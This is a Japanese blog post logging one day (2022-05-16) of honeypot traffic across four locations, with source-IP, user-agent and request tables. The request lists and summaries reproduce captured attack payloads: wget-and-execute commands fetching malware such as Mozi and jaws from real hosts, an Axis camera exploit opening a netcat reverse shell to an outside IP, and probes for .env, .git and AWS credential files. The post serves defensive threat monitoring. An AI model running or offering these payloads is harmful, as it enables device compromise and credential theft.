コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/05/16 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/05/16分です。

特徴
共通

Axis製品の脆弱性を狙うアクセス
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
/.awsへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget v1.kannimanelaji.com/jaws;
sh /tmp/jaws
Location:US

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
aiohttpによるスキャン行為
curlによるスキャン行為
.cssへのスキャン行為
/.awsへのスキャン行為
85.206.160.115に関する不正通信
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://41.216.189.209/bins/aqua.mpsl;
sh /tmp/aqua.mpsl
Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:108 (前日比:-65)
US:総アクセス数:146 (前日比:88)
UK:総アクセス数:124 (前日比:98)
SG:総アクセス数:61 (前日比:-95)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
40 18.216.220.138 United States
1 38.68.49.148 United States
1 40.122.147.100 United States
1 45.148.10.81 Romania
1 88.164.153.142 France
15 95.214.235.205 Ukraine
2 109.237.103.9 Russia
2 109.237.103.118 Russia
2 109.237.103.123 Russia
1 117.222.172.246 India
1 120.10.121.113 China
13 128.199.2.117 United Kingdom
8 135.125.244.48 France
5 135.125.246.189 France
1 143.198.235.94 United States
2 157.245.70.127 United States
1 163.172.88.201 United Kingdom
6 185.254.196.217 Ukraine
1 192.241.221.158 United States
2 193.56.29.120 United Kingdom
1 205.210.31.148 United States
1 216.66.35.139 United States

UserAgent一覧

件数 UserAgent
9 -
1 Hello, world
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
13 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
40 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
42 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_18.179.20.5_80\n
3 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 GET /.aws/credentials HTTP/1.1
42 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET ///.env HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /assets../.git/config HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /cgi-bin/.%2e/%2e%2e/.git/config HTTP/1.1
1 GET /cgi-bin/.%2e/.git/config HTTP/1.1
1 GET /cli/.env HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /content../.git/config HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /css../.git/config HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /events../.git/config HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /images../.git/config HTTP/1.1
1 GET /img../.git/config HTTP/1.1
1 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n
1 GET /js../.git/config HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lib../.git/config HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /media../.git/config HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+v1[.]kannimanelaji[.]com/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /static../.git/config HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vod_installer/.env HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.36.36.242 Hong Kong
1 20.92.243.94 United States
2 20.213.184.193 United States
5 23.254.128.22 United States
2 39.105.35.83 China
1 40.86.7.127 United States
1 45.148.10.81 Romania
10 51.79.29.48 Canada
73 51.81.155.128 United States
2 52.173.31.82 United States
2 52.173.38.233 United States
1 52.196.190.122 United States
1 65.182.64.216 United States
1 66.240.205.34 United States
1 77.245.8.135 Jordan
6 89.248.165.52 United Kingdom
2 92.255.85.183 Hong Kong
1 96.46.16.142 United States
1 103.143.39.118 India
3 104.208.28.101 United States
1 109.80.90.201 Czechia
2 109.237.103.9 Russia
2 109.237.103.38 Russia
2 109.237.103.123 Russia
1 143.198.235.94 United States
1 143.244.37.197 United Kingdom
1 163.172.88.201 United Kingdom
1 167.86.104.168 Germany
1 167.94.146.57 United States
1 185.220.100.251 Germany
9 185.254.196.223 Ukraine
1 192.241.222.214 United States
1 193.56.146.25 Russia
1 193.124.7.9 Czechia
1 198.98.49.201 United States
1 198.235.24.10 United States
1 198.235.24.159 United States
1 221.15.253.241 China

UserAgent一覧

件数 UserAgent
28 -
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
5 Mozilla/5.0 (Linux; U; Android-4.0.3; en-us; Galaxy Nexus Build/IML74K) AppleWebKit/535.7 (KHTML, like Gecko) CrMo/16.0.912.75 Mobile Safari/535.7
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Edg/101.0.1210.39
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Python/3.7 aiohttp/3.7.4.post0
71 curl/7.54.0
2 python-requests/2.26.0
1 python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 Gh0st\xad
1 MGLNDD_34.68.118.83_80\n
3 \x03
1 \x16\x03\x01\x01C\x01
2 \x16\x03\x01\x01D\x01
7 \x16\x03\x01\x02
2 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET ///.env HTTP/1.1
1 GET /2Tmi HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /__Additional HTTP/1.1
1 GET /admin.aspx HTTP/1.1
1 GET /admin.cfm HTTP/1.1
1 GET /admin.cgi HTTP/1.1
1 GET /admin.jhtml HTTP/1.1
1 GET /admin.jsp HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.pl HTTP/1.1
1 GET /admin.shtml HTTP/1.1
1 GET /api/system/deviceinfo HTTP/1.1
1 GET /base.aspx HTTP/1.1
1 GET /base.cgi HTTP/1.1
1 GET /base.inc HTTP/1.1
1 GET /base.jhtml HTTP/1.1
1 GET /base.jsa HTTP/1.1
1 GET /base.jsp HTTP/1.1
1 GET /base.php HTTP/1.1
1 GET /base.pl HTTP/1.1
1 GET /base.shtml HTTP/1.1
1 GET /common/info.cgi HTTP/1.1
1 GET /currentsetting.htm HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /default.aspx HTTP/1.1
1 GET /default.cfm HTTP/1.1
1 GET /default.jhtml HTTP/1.1
1 GET /default.jsp HTTP/1.1
1 GET /default.shtml HTTP/1.1
1 GET /dniapi/userInfos HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /ghksjdghdfksanitycheckqwerjlhfgjksdghlid HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home.aspx HTTP/1.1
1 GET /home.cfm HTTP/1.1
1 GET /home.cgi HTTP/1.1
1 GET /home.jhtml HTTP/1.1
1 GET /home.jsa HTTP/1.1
1 GET /home.php HTTP/1.1
1 GET /home.pl HTTP/1.1
1 GET /home.shtml HTTP/1.1
2 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n
1 GET /index.asp HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.html HTTP/1.1
1 GET /index.jhtml HTTP/1.1
1 GET /index.jsa HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.shtml HTTP/1.1
1 GET /inicio.cfm HTTP/1.1
1 GET /inicio.pl HTTP/1.1
1 GET /localstart.jsp HTTP/1.1
1 GET /main.cgi HTTP/1.1
1 GET /menu.asp HTTP/1.1
1 GET /menu.aspx HTTP/1.1
1 GET /menu.jsp HTTP/1.1
1 GET /menu.pl HTTP/1.1
1 GET /nmaplowercheck1652567730 HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /readme.txt HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//41[.]216[.]189[.]209/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1
1 GET /start.cgi HTTP/1.1
1 GET /start.html HTTP/1.1
1 GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1
1 GET /tomcatwar.jsp HTTP/1.1
1 GET /v1/agent/self HTTP/1.1\n
1 HEAD / HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /functionRouter HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.148.10.81 Romania
1 59.94.204.169 India
101 87.123.205.227 Germany
3 89.248.165.52 United Kingdom
2 109.237.103.9 Russia
2 109.237.103.38 Russia
2 109.237.103.123 Russia
2 157.230.216.203 United States
1 163.172.88.201 United Kingdom
1 167.248.133.120 United States
2 179.43.154.206 Panama
1 192.241.219.252 United States
3 193.124.7.9 Czechia
1 198.235.24.5 United States
1 223.130.30.155 India

UserAgent一覧

件数 UserAgent
16 -
1 Hello, World
1 Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (iPad; CPU OS 10_0 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/49.0.2623.109 Mobile/14A5335b Safari/601.1.46
1 python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 MGLNDD_132.145.66.34_80\n
1 \x16\x03\x01\x01C\x01
2 \x16\x03\x01\x01D\x01
1 \x16\x03\x01
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
3 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET ///.env HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
4 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n
101 GET /phpmyadmin/ HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
3 23.128.248.43 United States
1 23.129.64.131 United States
1 27.38.193.56 China
2 37.0.10.182 Netherlands
1 38.68.49.148 United States
2 39.105.35.83 China
1 45.148.10.81 Romania
11 51.79.29.48 Canada
1 81.17.18.62 Panama
1 89.248.165.24 United Kingdom
6 89.248.165.52 United Kingdom
2 109.237.103.38 Russia
1 120.85.91.196 China
1 125.120.98.68 China
2 157.230.216.203 United States
1 162.142.125.211 United States
1 162.142.125.222 United States
1 163.172.88.201 United Kingdom
2 179.43.154.206 Panama
1 185.220.100.243 Germany
2 185.220.100.253 Germany
8 185.254.196.223 Ukraine
1 192.241.208.61 United States
4 193.124.7.9 Czechia
1 198.98.54.163 United States
1 205.210.31.152 United States
1 209.141.54.195 United States

UserAgent一覧

件数 UserAgent
25 -
2 Hello, World
1 Hello, world
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Edg/101.0.1210.39
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20190101 Firefox/70.0
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 MGLNDD_13.67.44.234_80
2 \x03
1 \x16\x03\x01\x01C\x01
2 \x16\x03\x01
1 ifofum
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
22 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.git/index HTTP/1.1
1 GET /.svn/entries HTTP/1.1
1 GET ///.env HTTP/1.1
1 GET /KIz89PGViACfvNpQE2eoOD5u HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /favicon.ico HTTP/1.1
5 GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0
1 GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 OPTIONS / RTSP/1.0
1 OPTIONS / HTTP/1.0
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /goform/webLogin HTTP/1.1
2 PRI * HTTP/2.0